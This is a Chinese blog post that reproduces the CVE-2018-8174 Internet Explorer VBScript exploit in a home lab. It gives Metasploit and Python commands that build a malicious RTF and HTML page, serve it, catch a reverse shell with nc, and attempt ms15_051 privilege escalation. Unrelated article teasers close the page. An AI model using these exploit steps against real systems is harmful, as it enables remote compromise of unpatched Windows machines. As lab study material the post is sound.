CVE 2018 8174漏洞兩種姿勢的復現

2021-09-02 17:52:38 字數 2111 閱讀 7437

cve-2018-8174漏洞兩種姿勢的復現

同樣進入目錄檢視一下是否複製成功

啟動 metasploit

已啟動埠監聽,在靶機上測試

在物理機上的最新一代ie瀏覽器訪問192.168.1.119:8080我們可以看見進行了會話,但是並沒有建立連線

接著進入cve-2018-8174_exp目錄

將cve-2018-8174.rb複製到 fileformat 目錄

cp cve-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

將cve-2018-8174.rtf複製到 exploits 目錄

這裡借用了一下別人的圖,因為我已做過一遍目錄已經改變

生成帶有惡意 vbscript 的 html 頁面和 word 文件

python cve-2018-8174.py -u 192.168.1.119/exploit.html -o msf.rtf -i 192.168.1.119 -p 4444

-u:url 位址

-o:生成文件

-i:監聽位址

-p:監聽埠

把 explot.html 複製到 /var/www/html,並開啟 apache 服務,以便靶機可以通過網頁訪問

使用nc 開啟埠的監聽

接下來現在win10上進行試驗,在靶機上使用ie或者是ie核心的瀏覽器進行訪問192.168.1.119/exploit,html

win10上進行訪問之後沒有連線建立,說明最新版的win10中的ie瀏覽器已經沒有了該漏洞

接下來在win7上進行一次試驗

在沒有打補丁的win7上存在該漏洞,並可以直接拿到shell,雖然不是管理員,但是已經可以幹很多事了,接下來便是提權的問題

該漏洞提權思路:先將 shell 轉換為 meterpreter ,再利用ms15_051提權

1、sessions -u 2

2、use windows/local/ms15_051_client_copy_image

3、set session 3

4、run

但是我還沒有成功,因為總是會在將shell轉換為meterpreter時連線斷掉,正在做後續的研究

CVE 2018 8174漏洞復現

cve 2018 8174是360 核心安全事業部高階威脅應對團隊在全球範圍內率先監控到的一例使用 0day 漏洞的 apt 攻擊,捕獲到了全球首例利用瀏覽器 0day 漏洞的新型 office 文件攻擊,並將該漏洞命名為 雙殺 漏洞。該漏洞影響最新版本的 ie 瀏覽器及使用了 ie 核心的應用程式...

兩種檔案解析漏洞Apache檔案解析漏洞

用.做分隔符 如某檔名為 werner.html.qwe.arex,apache在處理時,先讀取最後乙個字尾,為 arex 一看,這啥玩意啊,不認識,繼續讀取下乙個字尾 qwe 一看,呀,這又是啥,還是不認識,繼續讀下乙個字尾 html 一看,哦,這是個超文字標記語言檔案,俗稱網頁檔案,這回認識了,...

兩種if判斷

上海面試三 下面是c語言中兩種if語句判斷方式。請問哪種寫法更好?為什麼?int a if a1 第一種判斷方式 if 1a 第二判斷方式 答 這是個主觀題,不過多數人認為第二種好。從執行效率上講,第二種效率更高。另外,在編寫 時如果不小心將 寫成 即變成 1 a 這時編譯器將會給出錯誤提示。而如果...